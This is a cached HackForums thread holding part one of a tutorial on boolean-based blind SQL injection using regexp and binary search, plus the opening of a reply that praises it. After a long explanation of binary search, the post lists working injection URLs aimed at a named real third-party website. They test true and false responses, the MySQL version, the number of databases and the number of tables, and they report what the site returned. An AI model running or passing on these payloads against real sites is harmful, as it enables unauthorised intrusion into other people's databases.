<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3385306" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3385306" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3385306</a>. It is a snapshot of the page as it appeared on 1 Apr 2014 16:25:27 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3385306" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:oe6pK2pv04IJ:www.hackforums.net/showthread.php%3Ftid%3D3385306&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[Tutorial] boolean based blind SQLi using regexp with binary search - part #1 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[Tutorial] boolean based blind SQLi using regexp with binary search - part #1"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3385306"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-01-2014, 08:25 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/aprilfools.php"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><br><div class="pm_alert"><span style="color:red;">ALERT:</span>
 We have detected unusual activity with login IPs to your acccount. Your
 posting privileges have been suspended until we can verify that your 
account is not stolen. To have the suspension removed please go to this 
page: <a href="http://hackforums.net/accountrecovery.php" title="account recovery">http://hackforums.net/accountrecovery.php</a>. Please be patient as account recovery can take up to 48 hours.</div><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[Tutorial] boolean based blind SQLi using regexp with binary search - part #1</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3385306" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/rating.js"></script><div id="success_rating_3385306" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3385306"><li style="width: 0%" class="current_rating" id="current_rating_3385306">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3385306&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3385306&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3385306&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3385306&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3385306&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3385306" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3385306_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3385306" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3385306&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3385306");
// -->
</script><div><strong>[Tutorial] boolean based blind SQLi using regexp with binary search - part #1</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid31754590" id="pid31754590"></a><table class="tborder" style="border-top-width: 0; " id="post_31754590" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-07-2013, 06:37 AM <span id="edited_by_31754590"><span class="smalltext">(This post was last modified: 04-09-2013 11:50 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=31754590#pid31754590">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,185<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a> <br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31754590">This tutorial will have five parts. This is part <span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">#1</span></span></span><br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">Blind SQL injections</span></span></span><br><br>Blind
 SQL injections are injections where the database reacts to our 
injection but database data or errors are not displayed to the end 
users. Therefore the name “blind” comes from the fact that the injector 
injects blindly using some calculated assumptions and tries. We know <span style="color: #00BFFF;">boolean based</span> and <span style="color: #00BFFF;">time based</span> blind injections.<br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">Boolean based blind SQLi</span></span></span><br><br>At <span style="color: #32CD32;">boolean based SQLi</span>
 the SQLi vulnerable page will not display data from database as we are 
used when using union select based SQLi. Nor will we get some database 
data with error response as we are used when using error based SQLi. 
With blind SQLi it will display differently depending on the results of 
our logical injected statement for that page. With boolean based blind 
SQLi there will be two possible responses: <span style="color: #32CD32;">True</span> or <span style="color: #FF4500;">False</span>.
 Its now up to the attacker to look at the response and decide whether 
his query succeeded or not. If the injected query returns TRUE, page 
will be displayed normally and if FALSE some text or images will be 
missing or image(s) will be resized or moved. Those differences may be 
minimal, so we must be careful to notice them.<br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">Binary search</span></span></span><br><br>I will try to explain <span style="color: #32CD32;">binary search</span>
 with a game "guess a number". You can select any number in range from 0
 to 100 (million) and I will try to guess it. You will tell me after 
each guess if my guessed number is higher or lower than your secret 
number. I am offering you $100 if I don't guess your number in max. 20 
attempts. Otherwise you will pay me. Will you accept such game? <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0"> Well, you shouldn't. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/non.gif" style="vertical-align: middle;" alt="Non" title="Non" border="0">
 Using binary search (also called half-interval search, split half 
search...) everyone can guess secret number in range 0 - 100 in max 20 
attempts. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>For easier understanding (easier math <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/rolleyes.gif" style="vertical-align: middle;" alt="Rolleyes" title="Rolleyes" border="0">) I will explain binary searching with smaller range 0 - 100 where 7 attempts are needed to guess the secret number.<br><br>The
 binary search consists of examining a middle value of a list (range) to
 see which half contains the desired value. The middle value of the 
appropriate half is then examined again to see which half of the half 
contains the value in question. This halving process is continued until 
the value is located. We must know min. and max. value. In our case 
min=0 and max=100. We can calculate middle value of this range with 
simple formula: <span style="color: #FFD700;">mid=(max+min)/2</span> so in our case (100+0)/2=<span style="color: #00BFFF;">50</span>. Let's imagine you selected number <span style="color: #32CD32;">23</span>. So my first question will be:<br><br><span style="color: #FFA500;"><span style="font-weight: bold;">step 1</span></span>: is your number higher than 50? and your answer will be No.<br><br>I
 will modify my max. value and change it to 50 as based on your answer 
it could be 50 or less. Recalculate new mid. value: mid=(max+min)/2 
--&gt; (50+0)/2=<span style="color: #00BFFF;">25</span>. My next question will be:<br><br><span style="color: #FFA500;"><span style="font-weight: bold;">step 2</span></span>: is your number higher than 25? and your answer will be No.<br><br>Let's modify my max. value again and change it to 25. Recalculate new mid. value: mid=(max+min)/2 --&gt; (25+0)/2=<span style="color: #00BFFF;">13</span> (we rounded 12.5 up to 13). My next question will be:<br><br><span style="color: #FFA500;"><span style="font-weight: bold;">step 3</span></span>: is your number higher than 13? and your answer will be Yes.<br><br>This
 time we will modify our min. value and change it to 14 (because you 
answered your value is higher than 13). Recalculate new mid. value: 
mid=(max+min)/2 --&gt; (25+14)/2=<span style="color: #00BFFF;">20</span> (19.5 rounded up to 20). My next question will be:<br><br><span style="color: #FFA500;"><span style="font-weight: bold;">step 4</span></span>: is your number higher than 20? and your answer will be Yes.<br><br>Let's
 modify our min. value again and change it to 21 (because you answered 
your value is higher than 20). Recalculate new mid. value: 
mid=(max+min)/2 --&gt; (25+21)/2=<span style="color: #00BFFF;">23</span>. My next question will be:<br><br><span style="color: #FFA500;"><span style="font-weight: bold;">step 5</span></span>: is your number higher than 23? and your answer will be No.<br><br>Let's
 modify our max. value again and change it to 23 (because you answered 
your value is not higher than 23). Recalculate new mid. value: 
mid=(max+min)/2 --&gt; (23+21)/2=<span style="color: #00BFFF;">22</span>. My next question will be:<br><br><span style="color: #FFA500;"><span style="font-weight: bold;">step 6</span></span>: is your number higher than 22? and your answer will be Yes.<br><br>Let's
 modify our min. value and change it to 23 (because you answered your 
value is higher than 22. Recalculate new mid. value: mid=(max+min)/2 
--&gt; (23+23)/2=<span style="color: #00BFFF;">23</span>. My next <span style="text-decoration: underline;"><span style="font-weight: bold;">statement</span></span> will be:<br><br><span style="color: #FFA500;"><span style="font-weight: bold;">step 7</span></span>: Your selected number is 23!!!<br><br>I
 can now conclude your selected number is 23 because two steps back you 
answered your number is not higher than 23 and one step back you 
answered your number is higher than 22. Based on these two answers the 
only possible number is 23. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br><br>What
 have we learned? We needed max 7 attempts to guess selected number in 
range 0 - 100. If you don't believe me we will need only 20 attempts to 
guess number in range 0 - 100 (million) try it out.<br><br>Why is number
 of attempts using binary search important? Because we will search 
database names, table names, columns names... using regexp in range <span style="color: #32CD32;">36-122</span> as those identifiers can have ascii values in that range: allowed digits 0-9, basic Latin letters a-z A-Z, dollar, underscore (<a href="http://dev.mysql.com/doc/refman/5.0/en/identifiers.html%29" target="_blank">http://dev.mysql.com/doc/refman/5.0/en/i...iers.html)</a> have ascii values in range 36-122. If we look in ascii table (we will need it in this tutorial many times so bookmark <a href="http://www.asciitable.com/" target="_blank">http://www.asciitable.com</a>) we see <span style="color: #00BFFF;">$</span> has lowest ascii value <span style="color: #32CD32;">36</span> and <span style="color: #00BFFF;">z </span>has highest ascii value <span style="color: #32CD32;">122</span>. 36 and 122 will be our min and max value for first attempt in our binary search.<br><br>Knowing logic of binary search we can already predict <span style="color: #00BFFF;">we will need 7 attempts</span>
 to "guess" each character (letter or number) in database name, table 
name, columns name... This is much less then blind guessing character by
 character in all possible (table or column) names we try one after 
another. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">Regular expression - regexp</span></span></span><br><br>A
 regular expression is a set of characters that specify a pattern that 
provides concise and flexible means to specify and recognize strings of 
text, such as particular characters, words, or patterns of characters. 
Regular expressions are used when you want to search for text containing
 a particular pattern. Common abbreviations for regular expression 
include regex and regexp. To make it short: Regexp is a powerful way of 
specifying a pattern for a complex search (<a href="http://dev.mysql.com/doc/refman/5.1/en/regexp.html%29." target="_blank">http://dev.mysql.com/doc/refman/5.1/en/regexp.html).</a><br><br>As
 we will be searching character by character in table names, column 
names... we will be using syntax where we define the possible range of 
allowed letters like:<br><br>regexp '^[a-z]'<br><br>where:<ul><li><span style="color: #FFA500;">^</span> = match the beginning of a string</li> <li><span style="color: #FFA500;">[]</span> = if we want to match specific characters we can use the square brackets to identify the exact characters we are searching for</li> <li><span style="color: #FFA500;">[a-z]</span> = we want to match only specific characters between a and z<br></li></ul><br>I opened a <a href="http://www.hackforums.net/showthread.php?tid=3224910" target="_blank">SQLi challenge #37</a> where task was to display all table names with first letter <span style="color: #00BFFF;">c</span> or <span style="color: #00BFFF;">d</span> where one of the way to solve this task was using command like:<br><br><span style="font-style: italic;">...from information_schema.tables where table_name <span style="color: #32CD32;">regexp '^[c-d]'</span> AND table_schema=database()-- -</span><br><br>OK. Enough theory.<br><br><hr><br><span style="font-weight: bold;"><span style="color: #FFD700;">Testing for SQLi vulnerability</span></span><br>we added a true statement '5'='5'<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73' and '5'='5'-- -</code></div></div>site loads normally - response <span style="color: #32CD32;">true</span><br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/76c42383f662a6964ea122292d7b5139.jpg" alt="[Image: 76c42383f662a6964ea122292d7b5139.jpg]" border="0"></div></div><br>we added a false statement '5'='9'<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73' and '5'='9'-- -</code></div></div>site doesn't load normally - response <span style="color: #FF4500;">false</span><br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/13268bf70bdb8bca2b81980063a72831.jpg" alt="[Image: 13268bf70bdb8bca2b81980063a72831.jpg]" border="0"></div></div><br>Site
 is vulnerable to boolean based SQLi. The difference between true and 
false response in page is obvious so we won't have problems detecting 
its true or false response.<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Testing for version</span></span><br>We will use commands with <span style="color: #32CD32;">information_schema</span> so we need MySQL version 5 for that. That is why we need a test for version:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73' and substring(version(),1,1)=4-- -</code></div></div>site doesn't load normally - response <span style="color: #FF4500;">false</span><br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73' and substring(version(),1,1)=5-- -</code></div></div>site loads normally - response <span style="color: #32CD32;">true</span>. It is version 5.<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Testing for databases count</span></span><br>After trying with different numbers only with number 3 we get response <span style="color: #32CD32;">true</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73' and 3=(select count(*) from information_schema.schemata)-- -</code></div></div>So there are 3 databases.<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Testing for tables count in database()</span></span><br>After trying with different numbers only with number 61 we get response <span style="color: #32CD32;">true</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 61=(select count(*) from information_schema.tables where 
table_schema=database())-- -</code></div></div>So there are 61 tables in database().<br><br>Complete tutorial was to long to publish it in one post so I must divided it in few parts. Please continue reading <a href="http://www.hackforums.net/showthread.php?tid=3387210" target="_blank">part #2</a>
 of this tutorial where I will explain how to get table names using 
boolean based blind SQL injection using regexp with binary search.<br><br><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_31754590"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=31754590" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31897756" id="pid31897756"></a><table class="tborder" style="margin-top: 5px; " id="post_31897756" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-11-2013, 02:16 PM <span id="edited_by_31897756"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=31897756#pid31897756">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1377865"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/HackForums4.jpg" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1377865"><span class="group29">TechApp</span></a></span></strong> <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1377865" title="Away"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_away.gif" alt="Away" border="0"></a><br><span class="smalltext">Bye HF! Dumb mother fuckers.<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 87<br>Posts: 1,381<br>Joined: Jul 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1377865"><strong class="reputation_negative">-19</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31897756">These
 tutorials should get more credit. Blind SQLi is not always that easy 
and requires a shit ton of time. Even using a program to bot it can take
 days to complete. Although this is not the best method to choose, it 
